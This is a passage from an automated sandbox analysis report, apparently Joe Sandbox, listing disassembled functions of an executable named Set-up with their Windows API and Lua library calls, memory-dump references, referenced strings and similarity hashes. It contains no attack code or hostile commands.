                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExtentObjectPoint32SelectText
                                                                                          • String ID:
                                                                                          • API String ID: 1470722260-0
                                                                                          • Opcode ID: a45b34a2dd7be0dac1fea0678755c3c3fe44b49fa74e2ab3e92de505aa30646f
                                                                                          • Instruction ID: 40bbd8f38384e6c52fcc7947ff119b0a6f6b465b0ff068ee80d7be7d3b08b50e
                                                                                          • Opcode Fuzzy Hash: a45b34a2dd7be0dac1fea0678755c3c3fe44b49fa74e2ab3e92de505aa30646f
                                                                                          • Instruction Fuzzy Hash: A2213475508385EFCB249F54D844AAABBF9FB48300F00885DF99E836A0DB30E894DF52
                                                                                          APIs
                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00A73E60
                                                                                          • CreateCaret.USER32(?,00000000,?,?), ref: 00A73E7F
                                                                                          • ShowCaret.USER32(?), ref: 00A73E96
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A73EBF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaretCreate$BitmapShow_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1464997198-0
                                                                                          • Opcode ID: 8df18ef267ae417c559117162839281a9d16c21dcf6d639f7644560b72ff4aeb
                                                                                          • Instruction ID: 26090474a452d3ca43a92e23dfed6d258607a981a3db225d3f5cf76394056eef
                                                                                          • Opcode Fuzzy Hash: 8df18ef267ae417c559117162839281a9d16c21dcf6d639f7644560b72ff4aeb
                                                                                          • Instruction Fuzzy Hash: 862105726006049FCB216F78CC05BEAB7EDFF40300F05C62DF5AA86290DBB1BA419B90
                                                                                          APIs
                                                                                          • getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00BDBC1B), ref: 00BDBB13
                                                                                          • getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BDBC1B), ref: 00BDBB3D
                                                                                          • getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BDBC1B), ref: 00BDBB53
                                                                                          • getc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00BDBB65
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: getc
                                                                                          • String ID:
                                                                                          • API String ID: 1447138685-0
                                                                                          • Opcode ID: 29d382a8570c6704bd840381039a2d90bc320bfe05131649c6500cd2fcafa9aa
                                                                                          • Instruction ID: 527480213b3bca851570e020c09240453b14ed2b71ddc203fa759333b56efae2
                                                                                          • Opcode Fuzzy Hash: 29d382a8570c6704bd840381039a2d90bc320bfe05131649c6500cd2fcafa9aa
                                                                                          • Instruction Fuzzy Hash: 0F11A0715001459BDB248B69DC80A69FBE4EB45320F2405BFD89E83390E736EC669755
                                                                                          APIs
                                                                                          • _Query_perf_frequency.MSVCP140(00000000,00000000,?,?,00000000,00000000,00000000,00C00D70,000000FF,?,00AA9658,00000000,00000000), ref: 00A7FD90
                                                                                          • _Query_perf_counter.MSVCP140(?,00000000,00000000,00000000,00C00D70,000000FF,?,00AA9658,00000000,00000000), ref: 00A7FD9E
                                                                                          • __alldvrm.LIBCMT ref: 00A7FDA9
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7FDCC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Query_perf_counterQuery_perf_frequencyUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 3135650852-0
                                                                                          • Opcode ID: f0b1e34a9d52940fccef54298d1e6a8f155785f23272a26714fca8baeb113d71
                                                                                          • Instruction ID: 5b381c66200ffbe9b35f9f0d457665f7eb1b3f171de33eff4b66ad302d59c8b7
                                                                                          • Opcode Fuzzy Hash: f0b1e34a9d52940fccef54298d1e6a8f155785f23272a26714fca8baeb113d71
                                                                                          • Instruction Fuzzy Hash: D3018FB26043086FD310EBA95C45F3BBAECEFC8764F05867ABA19D3351D6309C0486A5
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00A68956
                                                                                            • Part of subcall function 00A69AE0: GetWindowRect.USER32(?,?), ref: 00A69B03
                                                                                            • Part of subcall function 00A69AE0: SendMessageW.USER32(?,0000018E,00000000,00000000), ref: 00A69B3E
                                                                                            • Part of subcall function 00A69AE0: SendMessageW.USER32(?,00000197,?,00000000), ref: 00A69B57
                                                                                          • SendMessageW.USER32(?,00000186,?,00000000), ref: 00A6896F
                                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00A68990
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00A68999
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Rect$InvalidateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1011746805-0
                                                                                          • Opcode ID: 7f43ab36ccc94b7413cbdf3d36b71af411b3c1768427185fcf2c408d582087be
                                                                                          • Instruction ID: 4edb4dbb15841a134b10fe1380ad91a3797802ed921fd25b949652609c6ae991
                                                                                          • Opcode Fuzzy Hash: 7f43ab36ccc94b7413cbdf3d36b71af411b3c1768427185fcf2c408d582087be
                                                                                          • Instruction Fuzzy Hash: 81F0E771350205BBEB259B61CC86FAA7B2AFB84B54F104024F6055B5E0CBB2B860DA94
                                                                                          APIs
                                                                                          • SelectObject.GDI32(?,?), ref: 00A63162
                                                                                          • DeleteObject.GDI32(00000000), ref: 00A6316B
                                                                                          • CreatePen.GDI32(00000000,00000001,?), ref: 00A63186
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00A63193
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CreateDelete
                                                                                          • String ID:
                                                                                          • API String ID: 1326144132-0
                                                                                          • Opcode ID: 8d76c50ad77864290e1914f017c6217b4644c6b332018060c35111ea07132fa0
                                                                                          • Instruction ID: a99cb0c6a12ef0f5e41b93631d5a6fe5f7fa3377bea0f50ba784e617cbe1acf3
                                                                                          • Opcode Fuzzy Hash: 8d76c50ad77864290e1914f017c6217b4644c6b332018060c35111ea07132fa0
                                                                                          • Instruction Fuzzy Hash: FDF0AC71010700AFDB315FA0EC08B57BBF5FB04715F014A19FA9B41A60C7B1A559DB91
                                                                                          APIs
                                                                                          • GetSysColor.USER32(0000000F), ref: 00ACE82A
                                                                                          • GetSysColor.USER32(00000014), ref: 00ACE834
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color
                                                                                          • String ID: gfff
                                                                                          • API String ID: 2811717613-1553575800
                                                                                          • Opcode ID: 8f211ad2460312918d35a0d44a320f5dc6cf250f3dca144b0f2ff3b03ef9bced
                                                                                          • Instruction ID: 2cdb83e932d9a2ba65c0a947450430c3db41375b17fc46ef3529489f24b5d74a
                                                                                          • Opcode Fuzzy Hash: 8f211ad2460312918d35a0d44a320f5dc6cf250f3dca144b0f2ff3b03ef9bced
                                                                                          • Instruction Fuzzy Hash: 05020675A01205CFCF14CF58C580AAABBF1FF48310F2585AAE859AB356D731ED55CBA0
                                                                                          APIs
                                                                                          • luaL_getsubtable.SET-UP(?,FFF0B9D8,_LOADED), ref: 00BDC515
                                                                                          • lua_setglobal.SET-UP(?,00000010), ref: 00BDC68B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_getsubtablelua_setglobal
                                                                                          • String ID: _LOADED
                                                                                          • API String ID: 422293290-1112303394
                                                                                          • Opcode ID: 10d1d13f2bd020804387f6a49e67636e9c567dd5e25e536b48ee2d04e0afe713
                                                                                          • Instruction ID: 690783594b8cf4870dc616a49acd612fe5f842bbca16b70cbd5c3095b7757453
                                                                                          • Opcode Fuzzy Hash: 10d1d13f2bd020804387f6a49e67636e9c567dd5e25e536b48ee2d04e0afe713
                                                                                          • Instruction Fuzzy Hash: 7D515E756002448BDB54DF29D891916B7E1EF84334B18C6AEE81A4F39BEB35E805CB91
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 00A6C65A
                                                                                          • GetClientRect.USER32(?,?), ref: 00A6C780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientRect
                                                                                          • String ID: W
                                                                                          • API String ID: 846599473-655174618
                                                                                          • Opcode ID: d8b4fc9b9ca83006ef568788f9fc6763df9044c5e66781c0ed1f154f8bbddb58
                                                                                          • Instruction ID: 03ba431d27bcae6da0327de17324506faa7302157e6fb5230dfae1c5a7ffa07c
                                                                                          • Opcode Fuzzy Hash: d8b4fc9b9ca83006ef568788f9fc6763df9044c5e66781c0ed1f154f8bbddb58
                                                                                          • Instruction Fuzzy Hash: 875102B4A01309DFDB18CFA4D998BAEBBB5FF48315F00446DE45AAB250DB74A944CF50
                                                                                          APIs
                                                                                          • luaL_setfuncs.SET-UP(?,00C381E0,00000000,00000002,00000000), ref: 00BDE2C7
                                                                                            • Part of subcall function 00BDC320: lua_checkstack.SET-UP(?,?), ref: 00BDC331
                                                                                            • Part of subcall function 00BDC320: lua_pushcclosure.SET-UP(?,?,?), ref: 00BDC396
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_setfuncslua_checkstacklua_pushcclosure
                                                                                          • String ID: Lua 5.3$_VERSION
                                                                                          • API String ID: 49232431-1729770358
                                                                                          • Opcode ID: bb14c78f7eafe093dd38014fc98d3656e9605220c67bc1c937270993c77ef372
                                                                                          • Instruction ID: 64dfa02204c210a4434aaf0abc998cf7b93ef47b3a85312dd4901c962a4e39bc
                                                                                          • Opcode Fuzzy Hash: bb14c78f7eafe093dd38014fc98d3656e9605220c67bc1c937270993c77ef372
                                                                                          • Instruction Fuzzy Hash: E9213E747006448FD714DF28C451A1AF7E2EF48320B54C6ADE45A8B3D6EB74ED41CB89
                                                                                          APIs
                                                                                          • GetMonitorInfoW.USER32(?,00000028), ref: 00A67BDB
                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00A67C35
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Info$MonitorParametersSystem
                                                                                          • String ID: (
                                                                                          • API String ID: 84451619-3887548279
                                                                                          • Opcode ID: c4781ad7594e0e6a74186e5ef28233eff853f9b6c88e1c9e95a14fb4e69ba68e
                                                                                          • Instruction ID: def19a2496a1a591fc51696ee1e8781406191e156cd72cf870cbbb666ddf255b
                                                                                          • Opcode Fuzzy Hash: c4781ad7594e0e6a74186e5ef28233eff853f9b6c88e1c9e95a14fb4e69ba68e
                                                                                          • Instruction Fuzzy Hash: 0831D6B5E042189FDB44CFA9D845BAEBBF5FB48310F11806AE809A7350DB759944CFA4
                                                                                          APIs
                                                                                          • luaL_callmeta.SET-UP(?,?,__tostring,?,?), ref: 00BDC0C9
                                                                                            • Part of subcall function 00BDBFA0: luaL_getmetafield.SET-UP(?,?,?), ref: 00BDBFCB
                                                                                          • lua_tolstring.SET-UP(?,000000FF,?), ref: 00BDC2E3
                                                                                          • luaL_error.SET-UP(?,'__tostring' must return a string,?,?), ref: 00BDC2F8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_callmetaL_errorL_getmetafieldlua_tolstring
                                                                                          • String ID: %s: %p$'__tostring' must return a string$__name$__tostring$false$nil$object length is not an integer$true
                                                                                          • API String ID: 1407362100-553602133
                                                                                          • Opcode ID: c1056f927186c779bafc83ef09da48de73d3e33df7741310369d4b1ae3c4922a
                                                                                          • Instruction ID: f936a8f0085d4a88c32312766296e05710a1f2e7ebee25a94a99ec1e00455c9d
                                                                                          • Opcode Fuzzy Hash: c1056f927186c779bafc83ef09da48de73d3e33df7741310369d4b1ae3c4922a
                                                                                          • Instruction Fuzzy Hash: FFF05473501105538E105A695C42C57FBCCDA51330B1403B7FC3CD63D5F920D954C2E6
                                                                                          APIs
                                                                                          • luaL_testudata.SET-UP(?,?,?), ref: 00BDAE3D
                                                                                            • Part of subcall function 00BDAD70: lua_getmetatable.SET-UP(?,?), ref: 00BDADA8
                                                                                          Strings
                                                                                          • number has no integer representation, xrefs: 00BDB174
                                                                                          • not enough memory for buffer allocation, xrefs: 00BDB2EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_testudatalua_getmetatable
                                                                                          • String ID: not enough memory for buffer allocation$number has no integer representation
                                                                                          • API String ID: 569719852-663388295
                                                                                          • Opcode ID: 3fa619fb55fd36d7cc91ad61c22549e1f43b292b52a773f9fd91068dd54b363a
                                                                                          • Instruction ID: 07658be90aa175554a4dda0ff9b9f3bf1ebc795eeb7b8b7f97f15d42d79cebf2
                                                                                          • Opcode Fuzzy Hash: 3fa619fb55fd36d7cc91ad61c22549e1f43b292b52a773f9fd91068dd54b363a
                                                                                          • Instruction Fuzzy Hash: C1D05E3500020DBFCF065F40DC0299A7BAAEF44350F108066FD2806361FB32E920EA91
                                                                                          APIs
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E5ED
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E61F
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E636
                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A8E658
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
